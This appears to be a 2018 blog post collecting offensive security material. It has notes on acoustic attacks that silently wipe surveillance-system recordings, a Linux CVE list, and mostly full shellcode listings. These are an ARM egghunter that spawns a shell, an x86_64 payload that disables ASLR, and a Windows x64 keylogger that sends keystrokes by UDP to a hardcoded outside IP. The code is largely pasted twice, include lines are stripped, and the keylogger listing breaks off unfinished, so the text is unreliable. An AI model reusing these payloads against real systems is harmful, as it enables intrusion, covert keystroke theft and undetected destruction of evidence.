Sunday, December 30, 2018
HDD Microphone
https://github.com/ortegaalfredo/kscope.git
hdd-killer: python script that emits a sound sweep to find the resonant frequency that interferes with the specified HDD. Video demo: https://www.youtube.com/watch?v=8DdqTz3CW5Y
use sound to crash drones by affecting gyroscopic sensor
utilizing the induction of magnetic sensors,
the researchers were able to apply side-channel attacks
for anti-lock braking systems
how to use
electromagnetic interference to inject signals into analog sensors
Audible waves vibrate the read/write head
and platters; ultrasonic waves alter the output of the HDD’s
shock sensor, intentionally causing the head to park.
Y. Michalevsky, D. Boneh, and G. Nakibly,
“Gyrophone: Recognizing Speech from Gyroscope Signals.”
in USENIX Security, 2014, pp. 1053–1067
============
Video Surveillance System Attack - live-feed without detection
============
Attacked system
Ezviz 720p 4-channel video surveillance system
stock Western Digital 3.5” Purple 1 TB
operating system on an on-board flash chip
speaker hangs from the ceiling, resting 10 cm directly
above the video surveillance system’s HDD
The system was subject to the malicious signal for increasing durations (60-180s)
- a 6,900 Hz sinusoidal signal at 120 dB SPL
- we monitored the system manually by looking at the live video feed from the system.
After the concluding the experiment, we examined the recordings from the HDD.
For all tests observer did not notice any abnormalities in the live video stream,
but attack durations longer than 12 seconds caused video loss recorded on the HDD.
Recordings from periods of interference
-less than 105 seconds exhibited video loss from about 12 seconds after being subjected to acoustic induced vibration until the vibration subsided.
In contrast, interference for periods of 105 seconds or longer resulted in video loss
from the beginning of the vibration until the device was restarted
In the case that a victim user is not physically near the system being attacked,
an adversary can use any frequency to attack the system.
The system’s live camera stream never displays indication of an attack.
Also the system does not provide any method to learn of audio in the environment.
Thus, if a victim user were not physically near the system,
an adversary can use audible signals while remaining undetected.
========================================================================
setup generates audible frequencies using
a Tektronix AFG3251 function generator, Yamaha R-S201 audio receiver,
a Pyramid Titanium Bullet Tweeter speaker
setup generates ultrasonic frequencies
a Keysight N5172B EXG X-Series RF Vector Signal Generator,
a CRY584 Power Amplifier, and a NU C Series Ultrasonic Sensor.
The setup measures the emitter’s actual output
using a CRY343 microphone and a RIGOL DS4022 oscilloscope
========================================================================
Linux Kernel - Vulnerabilities published - 2nd half 11/2018
Linux Kernel CVE-2018-19406 Local Denial of Service Vulnerability
2018-11-20
http://www.securityfocus.com/bid/105988
Linux Kernel CVE-2018-19407 Local Denial of Service Vulnerability
2018-11-20
http://www.securityfocus.com/bid/105987
Linux Kernel CVE-2018-16862 Local Security Bypass Vulnerability
2018-11-24
http://www.securityfocus.com/bid/106009
Linux Kernel CVE-2018-18955 Local Privilege Escalation Vulnerability
2018-11-16
http://www.securityfocus.com/bid/105941
RaspberyPi Egghunter execve NULL shellcode
/*
# Title: Linux/ARM - sigaction() Based Egghunter (PWN!) + execve("/bin/sh", NULL, NULL) Shellcode (52 Bytes)
# Date: 2018-09-24
# Tested: armv7l (Raspberry Pi 3 Model B+)
# Author: Ken Kitahara
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Procedure]
(1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode. (20 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #endline-spawn-1]
mov r7, #11
svc #1
spawn:
.ascii "/bin/shX"
endline:
pi@raspberrypi:~ $ as -o shell.o shell.s && ld -N -o shell shell.o
pi@raspberrypi:~ $ objcopy -O binary shell shell.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' shell.bin && echo
\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
pi@raspberrypi:~ $
(2) Create egghunting shellcode. (52 Bytes)
pi@raspberrypi:~ $ cat egghunter.s
.section .text
.global _start
_start:
.ARM
add lr, pc, #1
bx lr
.THUMB
eor r1, r1, r1
mov r3, #0xff
page_align:
orr r1, r3
ldr r4, egg
next_addr:
mov r7, #0x43
add r1, r1, #1
svc #1
sub r7, r7, #0x51
cmp r0, r7
beq page_align
ldr r2, [r1]
cmp r2, r4
bne next_addr
add r1, #4
ldr r2, [r1]
cmp r2, r4
bne next_addr
add r1, #4
mov pc, r1
eor r7, r7, r7
egg:
.ascii "PWN!"
pi@raspberrypi:~ $ as -o egghunter.o egghunter.s && ld -N -o egghunter egghunter.o
pi@raspberrypi:~ $ objcopy -O binary egghunter egghunter.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' egghunter.bin && echo
\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x49\x40\xff\x23\x19\x43\x08\x4c\x43\x27\x01\x31\x01\xdf\x51\x3f\xb8\x42\xf7\xd0\x0a\x68\xa2\x42\xf6\xd1\x04\x31\x0a\x68\xa2\x42\xf2\xd1\x04\x31\x8f\x46\x7f\x40\x50\x57\x4e\x21
pi@raspberrypi:~ $
[Operation Test]
pi@raspberrypi:~ $ gcc -fno-stack-protector -z execstack loader.c -o loader
pi@raspberrypi:~ $ ./loader
Egghunting Shellcode Length: 52
Shellcode Length: 28
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $
*/
#include
#include
unsigned char shell[] = \
// Egg Tag (4 Bytes * 2)
"PWN!PWN!"
// execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)
"\x02\xa0\x49\x40\x52\x40\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
// Egghunting Shellcode (52 Bytes)
unsigned char sc[] = \
"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
"\x49\x40\xff\x23\x19\x43\x08\x4c"
"\x43\x27\x01\x31\x01\xdf\x51\x3f"
"\xb8\x42\xf7\xd0\x0a\x68\xa2\x42"
"\xf6\xd1\x04\x31\x0a\x68\xa2\x42"
"\xf2\xd1\x04\x31\x8f\x46\x7f\x40"
"\x50\x57\x4e\x21";
void main()
{
printf("Egghunting Shellcode Length: %d\n", strlen(sc));
printf("Shellcode Length: %d\n", strlen(shell));
int (*ret)() = (int(*)())sc;
ret();
}
# Title: Linux/ARM - sigaction() Based Egghunter (PWN!) + execve("/bin/sh", NULL, NULL) Shellcode (52 Bytes)
# Date: 2018-09-24
# Tested: armv7l (Raspberry Pi 3 Model B+)
# Author: Ken Kitahara
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Procedure]
(1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode. (20 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #endline-spawn-1]
mov r7, #11
svc #1
spawn:
.ascii "/bin/shX"
endline:
pi@raspberrypi:~ $ as -o shell.o shell.s && ld -N -o shell shell.o
pi@raspberrypi:~ $ objcopy -O binary shell shell.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' shell.bin && echo
\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
pi@raspberrypi:~ $
(2) Create egghunting shellcode. (52 Bytes)
pi@raspberrypi:~ $ cat egghunter.s
.section .text
.global _start
_start:
.ARM
add lr, pc, #1
bx lr
.THUMB
eor r1, r1, r1
mov r3, #0xff
page_align:
orr r1, r3
ldr r4, egg
next_addr:
mov r7, #0x43
add r1, r1, #1
svc #1
sub r7, r7, #0x51
cmp r0, r7
beq page_align
ldr r2, [r1]
cmp r2, r4
bne next_addr
add r1, #4
ldr r2, [r1]
cmp r2, r4
bne next_addr
add r1, #4
mov pc, r1
eor r7, r7, r7
egg:
.ascii "PWN!"
pi@raspberrypi:~ $ as -o egghunter.o egghunter.s && ld -N -o egghunter egghunter.o
pi@raspberrypi:~ $ objcopy -O binary egghunter egghunter.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' egghunter.bin && echo
\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x49\x40\xff\x23\x19\x43\x08\x4c\x43\x27\x01\x31\x01\xdf\x51\x3f\xb8\x42\xf7\xd0\x0a\x68\xa2\x42\xf6\xd1\x04\x31\x0a\x68\xa2\x42\xf2\xd1\x04\x31\x8f\x46\x7f\x40\x50\x57\x4e\x21
pi@raspberrypi:~ $
[Operation Test]
pi@raspberrypi:~ $ gcc -fno-stack-protector -z execstack loader.c -o loader
pi@raspberrypi:~ $ ./loader
Egghunting Shellcode Length: 52
Shellcode Length: 28
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $
*/
#include
#include
unsigned char shell[] = \
// Egg Tag (4 Bytes * 2)
"PWN!PWN!"
// execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)
"\x02\xa0\x49\x40\x52\x40\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
// Egghunting Shellcode (52 Bytes)
unsigned char sc[] = \
"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
"\x49\x40\xff\x23\x19\x43\x08\x4c"
"\x43\x27\x01\x31\x01\xdf\x51\x3f"
"\xb8\x42\xf7\xd0\x0a\x68\xa2\x42"
"\xf6\xd1\x04\x31\x0a\x68\xa2\x42"
"\xf2\xd1\x04\x31\x8f\x46\x7f\x40"
"\x50\x57\x4e\x21";
void main()
{
printf("Egghunting Shellcode Length: %d\n", strlen(sc));
printf("Shellcode Length: %d\n", strlen(shell));
int (*ret)() = (int(*)())sc;
ret();
}
shellcode ASLR disable
/*
ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []
Test:
run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"
Assembly:
global _start
section .ASLR
_start:
#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall
*/
#include
#include
unsigned char ASLR[] = \
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00"
"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f"
"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f"
"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a"
"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";
int main()
{
printf("Shellcode len: %d\n", strlen(ASLR));
int (*ret)() = (int(*)())ASLR;
ret();
}
ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []
Test:
run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"
Assembly:
global _start
section .ASLR
_start:
#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall
*/
#include
#include
unsigned char ASLR[] = \
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00"
"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f"
"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f"
"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a"
"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";
int main()
{
printf("Shellcode len: %d\n", strlen(ASLR));
int (*ret)() = (int(*)())ASLR;
ret();
}
shellcode generator for win x64 remote keylogger
/*
# Title : Windows x64 Remote Keylogger (UDP)
# size : 864 bytes
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 10 x64 pro
# Date : 26-10-2018
# Email: shifath12@gmail.com
*/
/*
keyl.obj: file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: eb 1d jmp 1f
0000000000000002 <_init_>:
2: 48 31 d2 xor rdx,rdx
5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]
a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]
e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]
12: 48 8b 30 mov rsi,QWORD PTR [rax]
15: 48 8b 06 mov rax,QWORD PTR [rsi]
18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]
1c: 5b pop rbx
1d: 53 push rbx
1e: c3 ret
000000000000001f:
1f: e8 de ff ff ff call 2 <_init_>
0000000000000024 <_p2_>:
24: 52 push rdx
25: 52 push rdx
26: 4c 8d 3c 24 lea r15,[rsp]
2a: 48 83 ec 38 sub rsp,0x38
2e: 4c 8d 24 24 lea r12,[rsp]
32: 48 83 ec 58 sub rsp,0x58
36: 48 8d 3c 24 lea rdi,[rsp]
3a: 41 57 push r15
3c: 41 54 push r12
3e: 57 push rdi
3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
46: 54 49 53
49: 50 push rax
4a: 48 31 c0 xor rax,rax
4d: 66 b8 cc 01 mov ax,0x1cc
51: 48 01 c3 add rbx,rax
54: 53 push rbx
55: 48 89 f1 mov rcx,rsi
58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]
5f: 4d 31 c0 xor r8,r8
62: 41 b0 02 mov r8b,0x2
65: 49 89 f9 mov r9,rdi
68: ff d3 call rbx
6a: 41 5d pop r13
6c: 48 31 c0 xor rax,rax
6f: 50 push rax
70: 50 push rax
71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377
78: 32 2e 64
7b: 48 89 04 24 mov QWORD PTR [rsp],rax
7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c
86: 48 8d 0c 24 lea rcx,[rsp]
8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]
8e: 48 83 ec 28 sub rsp,0x28
92: ff d6 call rsi
94: 48 96 xchg rsi,rax
96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]
9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375
a1: ff d0 call rax
a3: 48 89 c1 mov rcx,rax
a6: 49 8d 55 8c lea rdx,[r13-0x74]
aa: 4d 31 c0 xor r8,r8
ad: 41 b0 06 mov r8b,0x6
b0: 4c 8d 4f 10 lea r9,[rdi+0x10]
b4: 41 ff d5 call r13
b7: 48 89 f1 mov rcx,rsi
ba: 49 8d 55 e7 lea rdx,[r13-0x19]
be: 4d 31 c0 xor r8,r8
c1: 41 b0 03 mov r8b,0x3
c4: 4c 8d 4f 40 lea r9,[rdi+0x40]
c8: 41 ff d5 call r13
cb: 48 83 c4 38 add rsp,0x38
00000000000000cf <_p3_>:
cf: 48 31 c9 xor rcx,rcx
d2: 66 b9 98 01 mov cx,0x198
d6: 48 29 cc sub rsp,rcx
d9: 48 83 c1 6a add rcx,0x6a
dd: 48 8d 14 24 lea rdx,[rsp]
e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]
e5: ff d3 call rbx
e7: 48 31 c9 xor rcx,rcx
ea: b1 02 mov cl,0x2
ec: 51 push rcx
ed: 51 push rcx
ee: 5a pop rdx
ef: 41 58 pop r8
f1: 41 b0 11 mov r8b,0x11
f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]
f8: ff d3 call rbx
fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax
fe: 48 8b 1f mov rbx,QWORD PTR [rdi]
101: 48 31 c9 xor rcx,rcx
104: ff d3 call rbx
106: 41 c6 07 02 mov BYTE PTR [r15],0x2
10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db
111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1
118: 63
119: 4d 31 c9 xor r9,r9
11c: 41 51 push r9
11e: 41 51 push r9
120: 59 pop rcx
121: 5a pop rdx
122: b1 0d mov cl,0xd
124: 49 89 c0 mov r8,rax
127: b2 bc mov dl,0xbc
129: 4c 01 ea add rdx,r13
12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]
130: ff d3 call rbx
0000000000000132 <_p4_>:
132: 49 8d 4c 24 08 lea rcx,[r12+0x8]
137: 48 31 d2 xor rdx,rdx
13a: 52 push rdx
13b: 52 push rdx
13c: 41 58 pop r8
13e: 41 59 pop r9
140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]
144: ff d3 call rbx
146: 49 8d 4c 24 08 lea rcx,[r12+0x8]
14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]
14f: ff d3 call rbx
151: 49 8d 4c 24 08 lea rcx,[r12+0x8]
156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]
15a: ff d3 call rbx
15c: eb d4 jmp 132 <_p4_>
000000000000015e:
15e: 47 rex.RXB
15f: 65 74 4d gs je 1af
162: 6f outs dx,DWORD PTR ds:[rsi]
163: 64 75 6c fs jne 1d2
166: 65 48 61 gs rex.W (bad)
169: 6e outs dx,BYTE PTR ds:[rsi]
16a: 64 6c fs ins BYTE PTR es:[rdi],dx
16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx
172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261
179: 79 41
17b: 01 53 65 add DWORD PTR [rbx+0x65],edx
000000000000017c:
17c: 53 push rbx
17d: 65 74 57 gs je 1d7
180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f
187: 6f outs dx,DWORD PTR ds:[rsi]
188: 6f outs dx,DWORD PTR ds:[rsi]
189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41
18d: 01 43 61 add DWORD PTR [rbx+0x61],eax
190: 6c ins BYTE PTR es:[rdi],dx
191: 6c ins BYTE PTR es:[rdi],dx
192: 4e rex.WRX
193: 65 78 74 gs js 20a
196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]
198: 6f outs dx,DWORD PTR ds:[rsi]
199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1
19d: 47 rex.RXB
19e: 65 74 4b gs je 1ec
1a1: 65 79 53 gs jns 1f7
1a4: 74 61 je 207
1a6: 74 65 je 20d
1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax
1ab: 74 4d je 1fa
1ad: 65 73 73 gs jae 223
1b0: 61 (bad)
1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx
1b8: 6e outs dx,BYTE PTR ds:[rsi]
1b9: 73 6c jae 227
1bb: 61 (bad)
1bc: 74 65 je 223
1be: 4d rex.WRB
1bf: 65 73 73 gs jae 235
1c2: 61 (bad)
1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax
1c9: 70 61 jo 22c
1cb: 74 63 je 230
1cd: 68 4d 65 73 73 push 0x7373654d
1d2: 61 (bad)
1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx
00000000000001d7:
1d7: 57 push rdi
1d8: 53 push rbx
1d9: 41 53 push r11
1db: 74 61 je 23e
1dd: 72 74 jb 253
1df: 75 70 jne 251
1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi
1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]
1e7: 74 01 je 1ea
1e9: 73 65 jae 250
1eb: 6e outs dx,BYTE PTR ds:[rsi]
1ec: 64 74 6f fs je 25e
1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx
00000000000001f0:
1f0: 56 push rsi
1f1: 57 push rdi
1f2: 41 50 push r8
1f4: 52 push rdx
1f5: 41 51 push r9
1f7: 51 push rcx
1f8: 41 5b pop r11
1fa: 48 31 db xor rbx,rbx
1fd: 53 push rbx
1fe: 53 push rbx
1ff: 5a pop rdx
200: 58 pop rax
201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]
204: 48 01 cb add rbx,rcx
207: b2 88 mov dl,0x88
209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]
20c: 48 01 c8 add rax,rcx
20f: 48 31 d2 xor rdx,rdx
212: 52 push rdx
213: 52 push rdx
214: 52 push rdx
215: 41 58 pop r8
217: 41 59 pop r9
219: 41 5a pop r10
21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
21f: 4d 01 d8 add r8,r11
222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]
226: 4d 01 d9 add r9,r11
229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]
22d: 4d 01 da add r10,r11
230: 48 31 d2 xor rdx,rdx
233: 48 31 f6 xor rsi,rsi
236: 56 push rsi
237: 59 pop rcx
238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]
23c: 4c 01 de add rsi,r11
23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
244: 48 31 c0 xor rax,rax
247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]
24a: 48 ff c1 inc rcx
24d: 3c 01 cmp al,0x1
24f: 75 f6 jne 247
251: 48 ff c2 inc rdx
254: 51 push rcx
255: 48 ff c9 dec rcx
258: 48 87 f7 xchg rdi,rsi
25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]
25d: 59 pop rcx
25e: 75 d3 jne 233
260: 48 ff ca dec rdx
263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
268: 48 01 cf add rdi,rcx
26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi
270: 48 31 db xor rbx,rbx
273: 53 push rbx
274: 58 pop rax
275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]
27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]
27e: 4c 01 d8 add rax,r11
281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]
285: 48 89 03 mov QWORD PTR [rbx],rax
288: 48 83 c3 08 add rbx,0x8
28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx
290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
295: 48 ff cb dec rbx
298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx
29d: 48 31 d2 xor rdx,rdx
2a0: 48 39 d3 cmp rbx,rdx
2a3: 75 8e jne 233
2a5: 48 83 c4 18 add rsp,0x18
2a9: 5f pop rdi
2aa: 5e pop rsi
2ab: c3 ret
00000000000002ac <_proceed_>:
2ac: 48 83 ec 58 sub rsp,0x58
2b0: 41 50 push r8
2b2: 52 push rdx
2b3: 51 push rcx
2b4: 48 31 f6 xor rsi,rsi
2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
2be: 54 49 53
00000000000002c1:
2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1]
2c5: 48 ff c6 inc rsi
2c8: 49 39 c2 cmp r10,rax
2cb: 75 f4 jne 2c1
2cd: 48 83 c6 07 add rsi,0x7
2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]
2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]
2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]
2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]
2e0: 48 85 c9 test rcx,rcx
2e3: 75 68 jne 34d <_out_>
2e5: 48 31 db xor rbx,rbx
2e8: b3 01 mov bl,0x1
2ea: 48 c1 e3 08 shl rbx,0x8
2ee: 48 39 da cmp rdx,rbx
2f1: 75 5a jne 34d <_out_>
2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
2f7: 48 31 c9 xor rcx,rcx
2fa: b1 14 mov cl,0x14
2fc: ff d3 call rbx
2fe: 66 41 89 04 24 mov WORD PTR [r12],ax
303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
307: 48 31 c9 xor rcx,rcx
30a: b1 10 mov cl,0x10
30c: ff d3 call rbx
30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax
314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
319: 8b 03 mov eax,DWORD PTR [rbx]
31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax
320: 48 83 ec 58 sub rsp,0x58
324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]
328: 41 54 push r12
32a: 5a pop rdx
32b: 4d 31 c9 xor r9,r9
32e: 41 51 push r9
330: 41 58 pop r8
332: 41 b0 10 mov r8b,0x10
335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15
33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8
33f: 49 83 e8 08 sub r8,0x8
343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]
347: ff d3 call rbx
349: 48 83 c4 58 add rsp,0x58
000000000000034d <_out_>:
34d: 5a pop rdx
34e: 41 58 pop r8
350: 41 59 pop r9
352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]
356: 48 31 c9 xor rcx,rcx
359: ff d3 call rbx
35b: 48 83 c4 58 add rsp,0x58
35f: c3 ret
*/
/*
section .text
global _start
_start:
jmp short p1
_init_:
xor rdx,rdx
mov rax,[gs:rdx+0x60] ; getting pointer of PEB structure
mov rax,[rax+24] ;rax=PPEB->Ldr
mov rax,[rax+32] ;Ldr->InMemoryOrderModuleList
mov rsi,[rax]
mov rax,[rsi]
mov rsi,[rax+32] ;kernel32.dll base address
pop rbx ;address of _p2_
push rbx
ret; transferring execution control to _p2_
p1:
call _init_
;-----------------------------------------------------------------------------------------------------
_p2_:
push rdx
push rdx
lea r15,[rsp]
sub rsp,56
lea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )
sub rsp,88
lea rdi,[rsp] ; pointer to function address
push r15
push r12
push rdi
mov rax,'HEREITIS'
push rax
xor rax,rax
mov ax,get_addr-_p2_
add rbx,rax ; address of get_addr
push rbx ;reserving future use
mov rcx,rsi
lea rdx,[rbx-(get_addr-kernel32_func)]
xor r8,r8
mov r8b,2
mov r9,rdi
call rbx ;loading kernel32_func functions
;-------------------------------------------------------------------------------------
pop r13 ;address of get_addr
;loading ws2_32.dll
xor rax,rax
push rax
push rax
